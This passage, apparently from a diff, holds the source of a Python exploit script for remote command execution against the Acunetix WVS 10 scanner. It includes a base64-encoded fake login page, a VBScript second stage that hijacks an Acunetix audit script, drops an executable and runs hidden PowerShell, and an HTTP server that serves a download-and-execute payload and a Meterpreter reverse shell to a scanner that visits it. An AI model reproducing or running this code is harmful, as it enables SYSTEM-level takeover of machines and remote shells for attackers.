"0KaDF7DQogIGNvbG9yOiAjZmZmOw0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDsNCiAgZm9udC13Z" \ + "WlnaHQ6IG5vcm1hbDsNCiAgbWFyZ2luOiAyZW0gYXV0byAwcHg7DQp9DQoub3V0ZXItc2NyZWVuew0KICBiYWNrZ3JvdW5kOiAjMTMy" \ + "MDJjOw0KICB3aWR0aDogOTAwcHg7DQogIGhlaWdodDogNTQwcHg7DQogIG1hcmdpbjogNTBweCBhdXRvOw0KICBib3JkZXItcmFkaXV" \ + "zOiAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6IDIwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMjBweDsNCiAgcG9zaXR" \ + "pb246IHJlbGF0aXZlOw0KICBwYWRkaW5nLXRvcDogMzVweDsNCn0NCg0KLm91dGVyLXNjcmVlbjpiZWZvcmV7DQogIGNvbnRlbnQ6IC" \ + "IiOw0KICBiYWNrZ3JvdW5kOiAjM2U0YTUzOw0KICBib3JkZXItcmFkaXVzOiA1MHB4Ow0KICBwb3NpdGlvbjogYWJzb2x1dGU7DQogI" \ + "GJvdHRvbTogMjBweDsNCiAgbGVmdDogMHB4Ow0KICByaWdodDogMHB4Ow0KICBtYXJnaW46IGF1dG87DQogIHotaW5kZXg6IDk5OTk" \ + "7DQogIHdpZHRoOiA1MHB4Ow0KICBoZWlnaHQ6IDUwcHg7DQp9DQoub3V0ZXItc2NyZWVuOmFmdGVyew0KICBjb250ZW50OiAiIjsNCi" \ + "AgYmFja2dyb3VuZDogI2VjZjBmMTsNCiAgd2lkdGg6IDkwMHB4Ow0KICBoZWlnaHQ6IDg4cHg7DQogIHBvc2l0aW9uOiBhYnNvbHV0Z" \ + "TsNCiAgYm90dG9tOiAwcHg7DQogIGJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6" \ + 
"IDBweCAwcHggMjBweCAyMHB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KfQ0KDQouc3RhbmR" \ + "7DQogIHBvc2l0aW9uOiByZWxhdGl2ZTsgIA0KfQ0KDQouc3RhbmQ6YmVmb3Jlew0KICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IG" \ + "Fic29sdXRlOw0KICBib3R0b206IC0xNTBweDsNCiAgYm9yZGVyLWJvdHRvbTogMTUwcHggc29saWQgI2JkYzNjNzsNCiAgYm9yZGVyL" \ + "WxlZnQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvcmRlci1yaWdodDogMzBweCBzb2xpZCB0cmFuc3BhcmVudDsNCiAgd2lkd" \ + "Gg6IDIwMHB4Ow0KICBsZWZ0OiAwcHg7DQogIHJpZ2h0OiAwcHg7DQogIG1hcmdpbjogYXV0bzsNCn0NCg0KLnN0YW5kOmFmdGVyew0K" \ + "ICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IGFic29sdXRlOw0KICB3aWR0aDogMjYwcHg7DQogIGxlZnQ6IDBweDsNCiAgcmlnaHQ6" \ + "IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItYm90dG9tOiAzMHB4IHNvbGlkICNiZGMzYzc7DQogIGJvcmRlci1sZWZ0OiA" \ + "zMHB4IHNvbGlkIHRyYW5zcGFyZW50Ow0KICBib3JkZXItcmlnaHQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvdHRvbTogLT" \ + "E4MHB4Ow0KICBib3gtc2hhZG93OiAwcHggNHB4IDBweCAjN2U3ZTdlDQp9DQoNCi5pbm5lci1zY3JlZW57DQogIHdpZHRoOiA4MDBwe" \ + "DsNCiAgaGVpZ2h0OiAzNDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgbWFyZ2luOiAwcHggYXV0bzsNCiAgcGFkZGluZy10" \ + "b3A6IDgwcHg7DQp9DQoNCi5mb3Jtew0KICB3aWR0aDogNDAwcHg7DQogIGhlaWdodDogMjMwcHg7DQogIGJhY2tncm91bmQ6ICNlZGV" \ + "mZjE7DQogIG1hcmdpbjogMHB4IGF1dG87DQogIHBhZGRpbmctdG9wOiAyMHB4Ow0KICBib3JkZXItcmFkaXVzOiAxMHB4Ow0KICAtbW" \ + "96LWJvcmRlci1yYWRpdXM6IDEwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMTBweDsNCn0NCg0KaW5wdXRbdHlwZT0idGV4d" \ + "CJdew0KICBkaXNwbGF5OiBibG9jazsNCiAgd2lkdGg6IDMwOXB4Ow0KICBoZWlnaHQ6IDM1cHg7DQogIG1hcmdpbjogMTVweCBhdXRv" \ + "Ow0KICBiYWNrZ3JvdW5kOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgcGFkZGluZzogNXB4Ow0KICBmb250LXNpemU6IDE2cHg7DQo" \ + "gICBib3JkZXI6IDJweCBzb2xpZCAjZmZmOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBib3JkZXItcmFkaXVzOiA1cH" \ + "g7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCn0NCg0KaW5wdXRbdHlwZ" \ + "T0idGV4dCJdOmZvY3Vzew0KICBib3JkZXI6IDJweCBzb2xpZCAjMWFiYzlkDQp9DQoNCmlucHV0W3R5cGU9InN1Ym1pdCJdew0KICBk" \ + 
"aXNwbGF5OiBibG9jazsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgd2lkdGg6IDMxNHB4Ow0KICBwYWRkaW5nOiAxMnB4Ow0KICB" \ + "jdXJzb3I6IHBvaW50ZXI7DQogIGNvbG9yOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItcm" \ + "FkaXVzOiA1cHg7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCiAgZm9u" \ + "dC1zaXplOiAxN3B4Ow0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KfQ0KDQppbnB1dFt0eXBlPSJzdWJtaXQiXTpob3ZlcnsN" \ + "CiAgYmFja2dyb3VuZDogIzA5Y2NhNg0KfQ0KDQphew0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDs" \ + "NCiAgY29sb3I6IGdyYXk7DQogIGRpc3BsYXk6IGJsb2NrOw0KICBtYXJnaW46IDE1cHggYXV0bzsNCiAgdGV4dC1kZWNvcmF0aW9uOi" \ + "Bub25lOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBmb250LXNpemU6IDEycHg7DQp9DQoNCmE6aG92ZXJ7DQogIGNvb" \ + "G9yOiAjMWFiYzlkOw0KfQ0KDQoNCjo6LXdlYmtpdC1pbnB1dC1wbGFjZWhvbGRlciB7DQogICBjb2xvcjogZ3JheTsNCn0NCg0KOi1" \ + "tb3otcGxhY2Vob2xkZXIgeyAvKiBGaXJlZm94IDE4LSAqLw0KICAgY29sb3I6IGdyYXk7ICANCn0NCg0KOjotbW96LXBsYWNlaG9sZG" \ + "VyIHsgIC8qIEZpcmVmb3ggMTkrICovDQogICBjb2xvcjogZ3JheTsgIA0KfQ0KDQo6LW1zLWlucHV0LXBsYWNlaG9sZGVyIHsgIA0KI" \ + "CAgY29sb3I6IGdyYXk7ICANCn0NCjwvc3R5bGU+DQo8aDE+QWRtaW4gcGFuZWw8L2gxPg0KPGRpdiBjbGFzcz0ic3RhbmQiPg0KICA8" \ + "ZGl2IGNsYXNzPSJvdXRlci1zY3JlZW4iPg0KICAgIDxkaXYgY2xhc3M9ImlubmVyLXNjcmVlbiI+DQogICAgICA8ZGl2IGNsYXNzPSJ" \ + "mb3JtIj4NCiAgICAgIDxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIvbG9naW4iPg0KICAgICAgICA8aW5wdXQgdHlwZT0idGV4dC" \ + "IgbmFtZT0idXNyIiBwbGFjZWhvbGRlcj0iVXNlcm5hbWUiIC8+DQogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwd2QiI" \ + "HBsYWNlaG9sZGVyPSJQYXNzd29yZCIgLz4NCiAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiIgLz4NCiAg" \ + "ICAgICAgIDwvZm9ybT4NCiAgICAgICAgPGEgaHJlZj0iL2ZvcmdvdCI+TG9zdCB5b3VyIHBhc3N3b3JkPzwvYT4NCiAgICAgIDwvZGl" \ + "2PiANCiAgICA8L2Rpdj4gDQogIDwvZGl2PiANCjwvZGl2Pg==" + +# param NO +EXPLOIT_STAGE_2 = "U2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKQ0KRnVuY3Rpb24gRXNjYWxhdGVBbm" \ + 
"RFeGVjdXRlKCkNCiAgYmluZCA9ICJTZXQgb2JqID0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q" \ + "iIikiICYgdmJjcmxmICZfDQogICJvYmouRGVsZXRlRmlsZSgiIkM6XFByb2dyYW1EYXRhXEFjdW5ldGl4IFdWUyAxMFxEYXRhX" \ + "FNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiIikiICYgdmJjcmxmICZfDQogICAib2JqLk1vdmVGaWxlICIiQzp" \ + "cUHJvZ3JhbURhdGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiI" \ + "iwgIiJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBlclNlcnZlclxBSlBfQXVkaXQuc2NyaXB" \ + "0IiIgIiAmIHZiY3JsZiAmXw0KICAiRnVuY3Rpb24gUkVPbnJZSmUoKSIgJiB2YmNybGYgJl8NCiAgIk5tU1ROUFVyb0lLdFRxID" \ + "0gIiIlcyIiIiAmIHZiY3JsZiAmXw0KICAiRGltIGdVdERzem1uR050IiAmIHZiQ3JsZiAmXw0KICAiU2V0IGdVdERzem1uR050I" \ + "D0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiIikiICYgdmJjcmxmICZfDQogICJEaW0gaE1XRkN" \ + "6dUciICYgdmJjcmxmICZfDQogICJEaW0gZXJtbVRDalJ4SWpjWEciICYgdmJjcmxmICZfDQogICJEaW0ga0xrdVdOYnhuTFVIe" \ + "HR6IiAmIHZiY3JsZiAmXw0KICAiRGltIHJDUWNUekFBalJ4dSIgJiB2YmNybGYgJl8NCiAgIlNldCBlcm1tVENqUnhJamNYRyA" \ + "9IGdVdERzem1uR050LkdldFNwZWNpYWxGb2xkZXIoMikiICYgdmJjcmxmICZfDQogICJyQ1FjVHpBQWpSeHUgPSBlcm1tVENqU" \ + "nhJamNYRyAmICIiXCIiICYgZ1V0RHN6bW5HTnQuR2V0VGVtcE5hbWUoKSIgJiB2YmNybGYgJl8NCiAgImdVdERzem1uR050LkN" \ + "yZWF0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZiAmXw0KICAia0xrdVdOYnhuTFVIeHR6ID0gckNRY1R6QUFqUnh1I" \ + "CYgIiJcIiIgJiAiIk5ObWxmVmhqYld3emNqLmV4ZSIiIiAmIHZiY3JsZiAmXw0KICAiU2V0IGhNV0ZDenVHID0gZ1V0RHN6bW5" \ + "HTnQuQ3JlYXRlVGV4dEZpbGUoa0xrdVdOYnhuTFVIeHR6LCB0cnVlICwgZmFsc2UpICIgJiB2YmNybGYgJl8NCiAgIkZvciBpI" \ + "D0gMSB0byBMZW4oTm1TVE5QVXJvSUt0VHEpIFN0ZXAgMiIgJiB2YmNybGYgJl8NCiAgIiAgICBoTVdGQ3p1Ry5Xcml0ZSBDaHI" \ + "oQ0xuZygiIiZIIiIgJiBNaWQoTm1TVE5QVXJvSUt0VHEsaSwyKSkpIiAmIHZiY3JsZiAmXw0KICAiTmV4dCIgJiB2YmNybGYgJ" \ + "l8NCiAgImhNV0ZDenVHLkNsb3NlIiAmIHZiY3JsZiAmXw0KICAiRGltIHlFU3pGdUlNb211IiAmIHZiY3JsZiAmXw0KICAiU2V" \ + "0IHlFU3pGdUlNb211ID0gQ3JlYXRlT2JqZWN0KCIiV3NjcmlwdC5TaGVsbCIiKSIgJiB2YmNybGYgJl8NCiAgInlFU3pGdUlNb" \ + 
"211LnJ1biBrTGt1V05ieG5MVUh4dHoiICYgdmJjcmxmICZfDQogICInZ1V0RHN6bW5HTnQuRGVsZXRlRmlsZShrTGt1V05ieG5" \
+ "MVUh4dHopIiAmIHZiY3JsZiAmXw0KICAiJ2dVdERzem1uR050LkRlbGV0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZ" \
+ "iAmXw0KIkVuZCBGdW5jdGlvbiIgJiB2YmNybGYgJl8NCiJSRU9ucllKZSIgJiB2YmNybGYgJl8NCiJDcmVhdGVPYmplY3QoIiJ" \
+ "TY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIiKS5EZWxldGVGaWxlIFdTY3JpcHQuU2NyaXB0RnVsbE5hbWUiICYgdmJjcmxmI" \
+ "CZfDQoiV1NjcmlwdC5RdWl0Ig0KICBjd2QgPSBDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5FeHBhbmRFbnZpcm9ubWV" \
+ "udFN0cmluZ3MoIiVzIikgJiAiXHN0YWdlbGFzdC52YnMiDQogIFNldCBvYmpGaWxlQmluZCA9IGZzby5DcmVhdGVUZXh0RmlsZS" \
+ "hjd2QgLFRydWUpDQogIG9iakZpbGVCaW5kLldyaXRlIGJpbmQgJiB2YkNyTGYNCiAgb2JqRmlsZUJpbmQuQ2xvc2UNCiAgDQog" \
+ "IGpzID0gInZhciBzaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN0KCIiV1NjcmlwdC5TaGVsbCIiKTsiJiB2YmNybGYgJiAic2hlbG" \
+ "wucnVuKCdjbWQgL0Mgc3RhcnQgL0IgIiIiIiAiInBvd2Vyc2hlbGwiIiAtd2luZG93c3R5bGUgaGlkZGVuIC1jb21tYW5kICIi" \
+ "d3NjcmlwdCAiICYgUmVwbGFjZShjd2QsIlwiLCJcXCIpICYgIiIiJyk7Ig0KICBmc28uTW92ZUZpbGUgIkM6XFByb2dyYW1EYX" \
+ "RhXEFjdW5ldGl4IFdWUyAxMFxEYXRhXFNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiLCAiQzpcUHJvZ3JhbURh" \
+ "dGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiDQogIFNldCBvYm" \
+ "pGaWxlID0gZnNvLkNyZWF0ZVRleHRGaWxlKCJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBl" \
+ "clNlcnZlclxBSlBfQXVkaXQuc2NyaXB0IixUcnVlKQ0KICBvYmpGaWxlLldyaXRlIGpzICYgdmJDckxmDQogIG9iakZpbGUuQ2" \
+ "xvc2UNCiAgeSA9IE1vbnRoKE5vdykgJiAiLyIgJiBEYXkoTm93KSAmICIvIiAmIFllYXIoTm93KQ0KICBoID0gSG91cihOb3cp" \
+ "ICYgIjoiJiBNaW51dGUoTm93KSsxDQogIHNSZXF1ZXN0ID0gInsiInNjYW5UeXBlIiI6IiJzY2FuIiIsIiJ0YXJnZXRMaXN0Ii" \
+ "I6IiIiIiwiInRhcmdldCIiOlsiImh0dHA6Ly93d3cuZ29vZ2xlLml0IiJdLCIicmVjdXJzZSIiOiIiLTEiIiwiImRhdGUiIjoi" \
+ "IiIgJiB5ICYgIiIiLCIiZGF5T2ZXZWVrIiI6IiIxIiIsIiJkYXlPZk1vbnRoIiI6IiIxIiIsIiJ0aW1lIiI6IiIiICYgaCAmIC" \
+ "IiIiwiImRlbGV0ZUFmdGVyQ29tcGxldGlvbiIiOiIiRmFsc2UiIiwiInBhcmFtcyIiOnsiInByb2ZpbGUiIjoiIkRlZmF1bHQi" \
+ 
"IiwiImxvZ2luU2VxIiI6IiI8bm9uZT4iIiwiInNldHRpbmdzIiI6IiJEZWZhdWx0IiIsIiJzY2FubmluZ21vZGUiIjoiImhldX" \
+ "Jpc3RpYyIiLCIiZXhjbHVkZWRob3VycyIiOiIiPG5vbmU+IiIsIiJzYXZldG9kYXRhYmFzZSIiOiIiVHJ1ZSIiLCIic2F2ZWxv" \
+ "Z3MiIjoiIkZhbHNlIiIsIiJnZW5lcmF0ZXJlcG9ydCIiOiIiRmFsc2UiIiwiInJlcG9ydGZvcm1hdCIiOiIiUERGIiIsIiJyZX" \
+ "BvcnR0ZW1wbGF0ZSIiOiIiV1ZTRGV2ZWxvcGVyUmVwb3J0LnJlcCIiLCIiZW1haWxhZGRyZXNzIiI6IiIiIn19Ig0KICBzZXQg" \
+ "b0hUVFAgPSBDcmVhdGVPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIikNCiAgb0hUVFAub3BlbiAiUE9TVCIsICJodHRwOi8vMT" \
+ "I3LjAuMC4xOjgxODMvYXBpL2FkZFNjYW4iLCBmYWxzZQ0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJDb250ZW50LVR5cGUi" \
+ "LCAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIg0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJYLVJlcXVlc3" \
+ "RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Ig0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJBY2NlcHQiLCAiYXBwbGljYXRp" \
+ "b24vanNvbiwgdGV4dC9qYXZhc2NyaXB0LCAqLyo7IHE9MC4wMSINCiAgb0hUVFAuc2V0UmVxdWVzdEhlYWRlciAiQ29udGVudC" \
+ "1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb247IGNoYXJzZXQ9VVRGLTgiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIlJlcXVl" \
+ "c3RWYWxpZGF0ZWQiLCAgInRydWUiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZX" \
+ "F1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogRW5kIEZ1bmN0aW9uDQogDQogRXNjYWxhdGVBbmRFeGVjdXRlDQogZnNv" \
+ "LkRlbGV0ZUZpbGUgV1NjcmlwdC5TY3JpcHRGdWxsTmFtZQ0KIFdTY3JpcHQuUXVpdA=="
+
+
+class myHandler(BaseHTTPRequestHandler):
+ timeout = 5
+ server_version = "Apache"
+ sys_version = "1.2"
+
+ def log_message(self, format, *args):
+ try:
+ paths = str(list(args)[0])
+ if "prompt" in paths or "confirm" in paths or "alert" in paths:
+ print "[*] Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (%s) bytes !" % \
+ (len(PAYLOAD_DOWNLOAD_EXEC) + len(EXPLOIT_STAGE_1))
+ if "stage2" in paths:
+ print "[*] Triggering EXPLOIT_STAGE_2 sending (%s) bytes !" 
% len(EXPLOIT_STAGE_2)
+ return
+ except:
+ pass
+ return
+
+ def do_POST(self):
+ PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
+ "%TEMP%", gen_random_name(12))
+ data = self.rfile.read(int(self.headers.getheader("Content-Length")))
+ data = data.split("&")
+ self.send_response(200)
+ self.send_header('Content-type', 'text/html')
+ self.end_headers()
+ for param in data:
+ if "usr" in param:
+ param = param.split("=")[1]
+ self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
+ % (base64.b64encode("".join(x + "\x00" for x in PDE)),
+ ("Bad password for user %s , try again." % param)))
+ return
+ self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
+ % (base64.b64encode("".join(x + "\x00" for x in PDE)),
+ "Some data are missing , try again."))
+ return
+
+ def do_GET(self):
+ try:
+ if self.path == "/":
+ self.send_response(302)
+ self.send_header('Content-type', 'text/html')
+ self.send_header('Location', "login")
+ self.end_headers()
+ # Send the html message
+ self.wfile.write("Here")
+ return
+ elif self.path == "/stage2":
+ self.send_response(200)
+ self.send_header('Content-type', 'text/plain')
+ self.end_headers()
+ # Send the html message
+ self.wfile.write(base64.b64decode(EXPLOIT_STAGE_2)
+ % (PAYLOAD_METERPETRER % ip2b(sys.argv[2]), "%TEMP%"))
+ postexpthread = Thread(target=postexploitation, args=(self.client_address[0], ))
+ postexpthread.start()
+ return
+ else:
+ string = ""
+ try:
+ string = self.path.split("=")[1]
+ except:
+ pass
+ self.send_response(200)
+ self.send_header('Content-type', 'text/html')
+ self.end_headers()
+ # Send the html message
+ PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
+ "%TEMP%", gen_random_name(12))
+ self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
+ % (base64.b64encode("".join(x + "\x00" for x in PDE)), base64.b64decode(LOGIN_FORM)))
+ return
+ except Exception as e:
+ print e.message
+ self.send_response(200)
+ self.send_header('Content-type', 
'text/plain')
+ self.end_headers()
+ self.wfile.write("")
+ return
+
+if __name__ == "__main__":
+ print "\n\nAcunetix WVS 10 - SYSTEM Remote Command Execution (Daniele Linguaglossa)\n" \
+ "Payload: Meterpreter reverse TCP 4444"
+ try:
+ if len(sys.argv) > 2:
+ # Create a web server and define the handler to manage the
+ # incoming request
+ server = HTTPServer(('0.0.0.0', int(sys.argv[1])), myHandler)
+ print 'Exploit started on port *:%s' % sys.argv[1]
+ print '[+] Waiting for scanner...'
+
+ # Wait forever for incoming http requests
+ server.serve_forever()
+ else:
+ print "Usage: %s " % os.path.basename(sys.argv[0])
+
+ except KeyboardInterrupt:
+ print '^C received, shutting down the web server'
+ server.socket.close()